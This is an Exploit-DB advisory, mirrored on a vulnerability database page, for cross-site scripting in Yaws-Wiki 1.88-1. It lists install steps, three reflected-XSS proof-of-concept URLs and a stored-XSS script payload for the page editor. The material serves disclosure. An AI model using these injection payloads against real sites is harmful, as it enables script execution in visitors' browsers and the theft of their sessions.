Lucene search
+L

Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting

🗓️ 04 Apr 2011 00:00:00Reported by Michael BrooksType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting vulnerability foun

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-5025
5 Jan 201200:00
circl
CVE
CVE-2011-5025
29 Dec 201111:00
cve
Cvelist
CVE-2011-5025
29 Dec 201111:00
cvelist
Debian CVE
CVE-2011-5025
29 Dec 201111:00
debiancve
Exploit DB
Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
5 Jan 201200:00
exploitdb
EUVD
EUVD-2011-4930
7 Oct 202500:30
euvd
NVD
CVE-2011-5025
29 Dec 201111:55
nvd
OSV
DEBIAN-CVE-2011-5025
29 Dec 201111:55
osv
OSV
UBUNTU-CVE-2011-5025
29 Dec 201111:55
osv
Prion
Cross site scripting
29 Dec 201111:55
prion
Rows per page
Application: yaws-wiki
version affected: 1.88-1
platform:  Erlang
homepage:http://yaws.hyber.org/
Researcher: Michael Brooks
Orignal Advisory:https://sitewat.ch/en/Advisory/4

Install instructions for Ubuntu:
sudo apt-get install yaws-wiki

Edit:/etc/yaws/conf.d/yaws-wiki.conf
#add this:
<server wiki>
 port = 8181
 listen = 0.0.0.0
 docroot = /var/lib/yaws-wiki
</server>

Then restart yaws:
sudo /etc/init.d/yaws restart


Reflective XSS:
http://localhost:8181/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to xss.  This is
the"text" post variable:
<script>alert(1)</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.02817
33